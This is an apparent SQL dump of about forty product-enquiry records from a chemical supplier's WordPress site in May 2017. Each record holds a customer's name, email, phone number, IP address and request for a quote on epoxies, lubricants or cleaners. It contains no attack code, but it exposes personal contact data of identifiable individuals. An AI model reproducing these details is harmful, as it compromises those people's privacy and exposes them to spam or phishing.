INSERT INTO `wp_enquiry_detail_new` VALUES (931, 'Karen Krawczyk', 'kkrawczyk@msitransducers.com', 'Good morning,\n\nI\'m in need of a quote for the following two items:\n\nEpirez 5522-WY-55 (one gallon)\nEpikure 8290Y-60 (one gallon)\n\nRegards,\nKaren Krawczyk\nMSI Transducers Corp.\n543 Great Road\nLittleton, MA  01460\n', '978486-0404', 'please quote', '50.247.231.17', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1035";s:5:"title";s:21:"EPI-REZ™ 5522-WY-55";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:82:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIREZ-5522-WY-55.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-10 14:30:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (932, 'SELDEN SIEGER', 'Casieger@yahoo.com', 'Is this item available to the general public.  If so how much per lowest quality?', '610504-0220', 'Pricing', '184.2.20.156', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-10 15:01:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (933, 'Liqun MA', 'lqma@iastate.edu', 'What is the price and how soon it can be shipped? for 1 kg or 0.5 kg package', '', 'price and shipping info', '129.186.252.111', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"438";s:5:"title";s:7:"GPL 103";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-10 16:42:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (934, 'mjoyner', 'mjoyner@mschem.com', 'Test', '', '', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-11 17:57:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (935, 'Sam Bailey', 'sam@dynamicgravitysystems.com', 'Hello, I would like a quote for 12 cans of MS-222N Aero-Duster and 2 of MS-228 Cobra Dusters.  Thanks!', '734678-7451', 'quote', '73.78.233.15', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-11 18:01:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (936, 'Ren Malmer', 'ren@m-r-electronics.com', 'Hello-\n\nI am requesting a quote for QTY 1 P/N MS-122AV so we may experiment to see how well it will release our mold from Sycast 2651 epoxy potting material.\nSuggested alternates would be welcomed.\n\nThank you,\n', '281240-9400', 'RFQ', '96.64.35.61', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"182";s:5:"title";s:8:"MS-122AV";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-11 20:44:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (937, 'Cecile', 'cs_bonifacio@fischione.com', 'Please quote me the price for a quart of MS-111.', '', 'quart of MS-111', '50.233.137.50', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-11 20:57:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (938, 'Randy Skinner', 'randyskinner@telus.net', 'Wondering where I can purchase this product. Thanks.', '604583-2457', 'Where to buy . . .', '23.16.145.194', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-12 06:05:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (939, 'paresh barhate', 'paresh.barhate@fluidcontrols.com', 'we required Krytox 240 AC Grease,\nplease send your quotation', '940384-4486', 'Krytox 240 AC Grease,', '59.92.15.26', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-12 10:25:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (940, 'Stephanie Wilson', 'wilsons@airbornflex.com', 'Please advise the shelf life for the above.\nI couldn\'t find anything on the TDS.\n\nThank you very much', '416752-2224', 'MS477C', '64.47.180.163', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"637";s:5:"title";s:7:"MS-477C";s:5:"price";s:0:"";s:5:"quant";s:1:"0";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-477C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-12 14:53:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (941, 'Dilip Kumar Paul', 'pauldk@vcu.edu', 'Hi \nWhat is the smallest size EPON resin 828 bottle you have? What is price for that?\n\nThanks\nDilip', '804588-8465', 'Price', '128.172.48.134', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-12 16:51:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (942, 'Lakshmidhar Reddy Uppalapati', 'lakshmidhar.uppalapati@isza.com', 'Please send the quote', '734351-6890', '', '64.47.116.125', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-12 18:40:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (943, 'Devika Chauhan ', 'Chauhadk@mail.uc.edu', 'For academic use ', '513888-1582', '', '50.4.166.198', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-12 21:55:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (944, 'Henry Xu', 'hzx@deltavbio.com', 'What much would this cost?', '', '', '157.22.254.52', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-12 22:00:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (945, 'Amber Rivers', 'service@pathologyserviceinc.com', 'How much is the 1/2 KG container of this product?', '866398-9478', 'Pricing for Krytox GPL 202', '24.178.126.26', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"783";s:5:"title";s:7:"GPL 202";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_333727961.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-15 14:56:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (946, 'steve bliven', 'steve.bliven@thermofisher.com', 'Please provide price &amp; delivery for 1 gallon of Epikure 3140.\nThanks &amp; regards,\nSteve Bliven', '719445-5511', 'RFQ Epikure 3140', '198.22.92.40', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1868";s:5:"title";s:15:"EPIKURE™ 3140";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-15 15:09:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (947, 'Jennifer L Smith', 'jennifer@proworksps.com', 'Please provide me with price and availability on 24 of the part# MS222N\n', '214843-3903', 'Quote', '76.184.221.22', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:2:"24";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-15 16:53:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (948, 'Nicholas Scobert', 'nicholas.scobert@sncorp.com', 'I would like to get a quote for 24 cans of this solvent. Please address the quote to "SNC Procurement"', '775849-6585', 'MS-555', '12.231.151.100', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:2:"24";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-15 19:05:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (949, 'Danny Charles', 'cannonderbyracing@gmail.com', 'Could I please get a price on 1,2,4 ounce\nneedle bottles. If you Don\'t sell it that way any more how do you sell it?\nThanks  Danny Charles', '813600-7843', 'prices', '67.232.199.156', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-15 19:24:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (950, 'Brin Keenan', 'gmpc33@gmail.com', 'Just wondering how I order some of this', '802359-2100', 'How to order', '73.218.191.155', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-15 22:37:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (951, 'Rick Taylor', 'rtaylor@tmicnc.com', 'Looking to purchases a small amount of MS-122ADL', '763786-5949', 'Price and delivery', '209.181.245.242', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1679";s:5:"title";s:9:"MS-122ADL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:93:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122adl-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-16 11:13:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (952, 'Varun Gupta', 'v.gupta@lakshmifactrotytools.com', 'Need Delivery in India', '+919935514258', '', '122.160.95.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-16 11:46:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (953, 'Tom Cypranowski', 'tomc@detailersandmore.com', 'I am inquiring on prices for MS 260.  These will be shipped to 46406.\n\nThank you, \nTom Cypranowski', '630222-6002', 'MS 260 order', '130.76.96.156', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-16 15:44:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (954, 'Sheri Owens', 'sowens@meritec.com', 'Hello, \nI need a price quote and lead time on the MS-383H. Qty between 1 -10,  1 oz. bottles\nThanks,\nSheri\n440-354-2100 x 313 ', '440354-2100', 'Price quote', '12.168.82.154', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3606";s:5:"title";s:7:"MS-383H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_142198558.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-16 20:09:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (955, 'MIRAE', 'sgmoon2002@gmail.com', '- Commodity: Lubricant\n- PART NO. MS-143XD AND MS-782\n- Q\'ty: 5 liter\n- Delivery term: CIP Seoul by Courier\n- Payment: T/T before the shipment or Credit Card\n\nSG,Moon', '+822-2687-3900', 'Inquiry of lubricant', '122.47.157.100', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1681";s:5:"title";s:8:"MS-122XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-17 06:50:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (956, 'Kevin Daley', 'kdaley@gatorgrit.com', 'Please send pricing and availability for about 5 gallons.  We are looking for a new solution to our current release agent.', '937878-3946', 'Pricing', '198.24.110.70', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"310";s:5:"title";s:13:"ReleaSys 8900";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_523637050.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-17 14:51:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (957, 'Sharon Howse', 'sharon.howse@non.keysight.com', 'Hi Sales Team\n\nThis is to request a quote and lead time for -1ea - MS-739 8oz. -Liquid connector cleaner and lubricant\nMFG: Miller-Stephenson\n\n\nKind Regards', '916788-3675', 'Quote for MS-739 8oz', '4.14.33.59', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1840";s:5:"title";s:6:"MS-738";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-2-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-17 18:18:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (958, 'Deb Grant', 'deb@peakbeam.com', 'Hi!  I was looking for pricing for one quart of Epikure 3140.  Thanks!\n\nDeb Grant\nPeak Beam Systems, Inc.\n3938 Miller Road\nEdgemont, PA  19028', '610353-8505', 'Price for quart of Epikure 3140', '173.15.168.121', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1868";s:5:"title";s:15:"EPIKURE™ 3140";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-17 18:47:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (959, 'Robert Forsyth', 'rforsyth@lanl.gov', 'Please provide me with a quote for five one gallon bottles of Epon 815C epoxy. Thank you.', '505667-1151', 'Quote for  Epon 815C', '192.12.184.6', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-17 22:31:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (960, 'John Henderson', 'jah5646@gamil.com', 'Release agent/Dry Lubricant for casting light metal for glass', '443802-0559', 'Boron Nitride: Extra High Temperature', '170.97.67.112', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"308";s:5:"title";s:6:"MS-153";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Boron-nitride.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-17 22:57:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (961, 'Rashmi', 'rash_mysore@yahoo.com', 'I need this material at the earliest', '', 'Epoxy resin for fabrication of composites', '182.73.121.234', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:10:"9740110576";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-18 10:01:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (962, 'Matthew Rice', 'matthew.a.rice@navy.mil', 'Please provide a price quote for the MS-122AD PTFE dry lubricant 1- aerosol can.\nThank you.', '401832-3918', 'Price quote request', '138.162.0.42', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-18 17:40:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (963, 'RICK HAMILTON', 'RHAMILTON@NLTSUPERSTORE.COM', 'PLEASE QUOTE, SPRAY OR QUART CONTAINER', '954462-6500', 'MS-477C', '96.92.4.97', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"637";s:5:"title";s:7:"MS-477C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-477C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-18 19:05:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (964, 'Jimmy Magnusson', 'jmagnusson@tradecraft.me', 'Hello, I am in Compton CA and was wondering if I could pick up a case of MS-260 from your Sylmar CA location. \n\nThank you,\nJimmy\n', '424387-5652', 'MS-260 ', '70.211.139.17', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-18 20:13:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (965, 'Douglas Weinhold', 'douglas.t.weinhold.civ@mail.mil', 'Interested in 4+ cans of MS-470S 12oz spray cans and 1 quart of MS-470S bulk jar.  \n\nShipping to 07806.  \n\nQuote to: US ARMY ARDEC\n\nThanks for your time.  VR -Doug W', '973724-1842', 'RFQ', '131.92.242.91', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"190";s:5:"title";s:7:"MS-470S";s:5:"price";s:0:"";s:5:"quant";s:1:"4";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470S.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-19 13:59:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (966, 'Philippe Vallée', 'vallee@astro.umontreal.ca', 'Hi,\nI need a quotation for a bottle of MS-111.\nThanks\nPhilippe', '514343-7118', 'MS-111 Stripping agent', '132.204.60.34', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-19 18:36:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (967, 'Dale Curtz', 'Dale.Curtz@MSASafety.com', 'I would like pricing for four 12oz bottles.', '724776-8875', 'Pricing quote', '204.28.31.3', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1690";s:5:"title";s:20:"MS-755L Flux Remover";s:5:"price";s:0:"";s:5:"quant";s:1:"4";s:3:"img";s:85:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-755l-flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-19 20:25:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (968, 'Greg Netherwood', 'greg.netherwood@dtsweb.com', 'Hi,  How can I purchase MS-383H?', '562493-0158', 'MS-383H Availability?', '104.129.155.251', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3606";s:5:"title";s:7:"MS-383H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_142198558.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-20 00:02:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (969, 'Clayton Maner', 'cmaner@vols.utk.edu', 'How much for ms111', '336266-7872', '', '174.196.140.83', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-22 04:38:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (970, 'David Fagerquist', 'dfagerquist@michaelcurrydesign.com', 'If available, please send me a release kit containing all your releases. We fabricate in epoxy/carbon fiber parts in FRP as well as Silicon molds. Most of our products are highly detailed and challenging at best.\nThanks in advance for any and all assistance you can provide to us.\nDavid', '503543-4010', 'Sampling', '173.8.218.57', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"182";s:5:"title";s:8:"MS-122AV";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-05-22 17:15:05', '', NULL, '', '', '', NULL, '', ''); 
